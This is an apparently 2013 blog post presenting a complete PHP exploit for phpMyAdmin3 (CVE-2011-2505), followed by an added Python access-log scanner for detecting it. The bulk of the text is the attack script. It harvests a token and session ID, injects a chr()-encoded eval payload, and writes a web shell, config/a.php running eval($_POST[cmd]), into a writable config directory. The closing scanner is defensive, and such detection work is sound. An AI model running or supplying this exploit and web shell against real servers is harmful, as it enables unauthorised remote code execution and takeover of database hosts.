phpMyAdmin3 remote code execute, PHP version exploit

Posted on 2013-2-21 09:13:03
Lately I have been a full-time stay-at-home dad and have not followed the scene for many months; the blog has not been updated either.

Last night I was up all night with the kid and saw Heige's discussion in the php security group about the phpmyadmin3 vulnerability. I had not read the vulnerable code before, but a while back I had seen wofeiwo's exp on Weibo. According to Heige there was an exploitation method that is not "jilei" (of limited value), so during the night I dug through the code, studied it and wrote this reheated exp. Since I got to it late, many people had already studied the bug and written exps, so mine is just rehashing leftovers; treat it as research to pass the time.

First, kudos to wofeiwo's Python version of the exp, and to the dedication of wofeiwo and superhei, role models to learn from. That earlier exp, however, has some limitations on exploitation:
First, it needs session.auto_start = 1;
Second, in the default pma3 code the libraries directory is already access-controlled with .htaccess and cannot be requested.
And of course there is a third point nobody can get around: the config directory must exist and be writable.

After reading Heige's remarks in the group and looking at the code again, I found that the first two limitations can both be ignored. So this vulnerability really is not so "jilei" after all.

So I wrote this PHP version of the exp; the code is as follows:

#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
');

/**
 * working when the directory:"config" exists and is writeable.
 **/

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
');
    exit;
}

$host = $argv[1];
$path = $argv[2];

/**
 * Try to determine if the directory:"config" exists
 **/
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr = php_request('config/');
if (strpos($returnstr, '404')) {
    exit("[-] Exploit Failed! The directory:config does not exist!\n");
}

/**
 * Try to get token and sessionid
 **/
echo "[+] Try to get token and sessionid....\n";
$result = php_request('index.php');
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token = $resp[3];
$sessionid = $resp[1];
if ($token && $sessionid) {
    echo "[+] token: $token\n";
    echo "[+] Session ID: $sessionid\n";
} else {
    exit("[-] Can't get token and Session ID, Exploit Failed!\n");
}

/**
 * Try to insert shell into session
 **/
echo "[+] Try to insert shell into session....\n";
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net', '', 'phpMyAdmin='.$sessionid); // Actually, almost all the php files in the home directory of pma3 can be used here.

/**
 * Try to create webshell
 **/
echo "[+] Try to create webshell....\n";
php_request('setup/config.php', 'phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save', 'phpMyAdmin='.$sessionid);

/**
 * Try to check if the webshell was created successfully
 **/
echo "[+] Try to check if the webshell was created successfully....\n";
$content = php_request('config/config.inc.php');
if (strpos($content, 't00ls')) {
    echo "[+] Congratulations! Exploit successful....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
} else {
    exit("[-] Exploit Failed! Perhaps the directory:config does not exist or is not writeable!\n");
}

function php_request($url, $data = '', $cookie = '') {
    global $host, $path;

    $method = $data ? 'POST' : 'GET';

    $packet  = $method." ".$path.$url." HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $packet .= "Host: $host\r\n";
    $packet .= $data ? "Content-Type: application/x-www-form-urlencoded\r\n" : "";
    $packet .= $data ? "Content-Length: ".strlen($data)."\r\n" : "";
    $packet .= $cookie ? "Cookie: $cookie\r\n" : "";
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data ? $data : "";

    $fp = fsockopen(gethostbyname($host), 80);
    if (!$fp) {
        echo 'No response from '.$host; die;
    }
    fputs($fp, $packet);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

?>
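As an added, defender-side example that is not part of the original post: a small Python scanner that flags, in an Apache access log, the request sequence the exploit above produces (session_to_unset together with _SESSION[...] keys, a POST to setup/config.php, and a PHP file served from config/). The log lines, the /pma/ prefix and the client addresses are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format log sample (not taken from the original post);
# line 2 mirrors the shape of the db_create.php request the exploit above sends.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Feb/2013:09:13:03 +0800] "GET /pma/config/ HTTP/1.1" 403 199 "-" "Mozilla/4.0"
203.0.113.5 - - [21/Feb/2013:09:13:05 +0800] "GET /pma/db_create.php?token=abcd&session_to_unset=x&_SESSION%5BConfigFile%5D%5BServers%5D%5B0%5D%5Bhost%5D=h HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [21/Feb/2013:09:13:06 +0800] "POST /pma/setup/config.php HTTP/1.1" 200 1030 "-" "Mozilla/4.0"
203.0.113.5 - - [21/Feb/2013:09:13:07 +0800] "GET /pma/config/a.php HTTP/1.1" 200 12 "-" "Mozilla/4.0"
198.51.100.7 - - [21/Feb/2013:09:14:00 +0800] "GET /pma/index.php?token=ef01&db=test HTTP/1.1" 200 7124 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')


def indicators(line):
    """Return the set of CVE-2011-2505 exploitation indicators in one log line."""
    m = LOG_RE.match(line)
    if not m:
        return set()
    method, status = m.group("method"), int(m.group("status"))
    url = urlsplit(m.group("target"))
    path = unquote(url.path)
    # Percent-decode first so _SESSION%5B...%5D is compared as _SESSION[...].
    keys = parse_qs(unquote(url.query), keep_blank_values=True).keys()
    found = set()
    # session_to_unset plus a _SESSION[...] key is the session-injection primitive.
    if "session_to_unset" in keys and any(k.startswith("_SESSION[") for k in keys):
        found.add("session_injection")
    # POST to setup/config.php writes config/config.inc.php from session data.
    if method == "POST" and path.endswith("/setup/config.php"):
        found.add("setup_config_save")
    # A PHP file served (200) from config/, which a hardened install never exposes.
    if status == 200 and re.search(r"/config/[^/]+\.php$", path):
        found.add("php_in_config_dir")
    return found


def scan(log_text):
    """Map each client IP to the union of indicators it triggered."""
    per_ip = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            per_ip.setdefault(m.group("ip"), set()).update(indicators(line))
    return per_ip


def likely_exploit_chains(per_ip):
    """IPs showing the injection step plus a config write or a config/ shell hit."""
    return sorted(ip for ip, f in per_ip.items()
                  if "session_injection" in f and f & {"setup_config_save", "php_in_config_dir"})
```

Feed `scan()` a real access log and alert on `likely_exploit_chains()`; a single `session_injection` hit on its own is already worth a look, since no legitimate pma3 page sends that parameter pair.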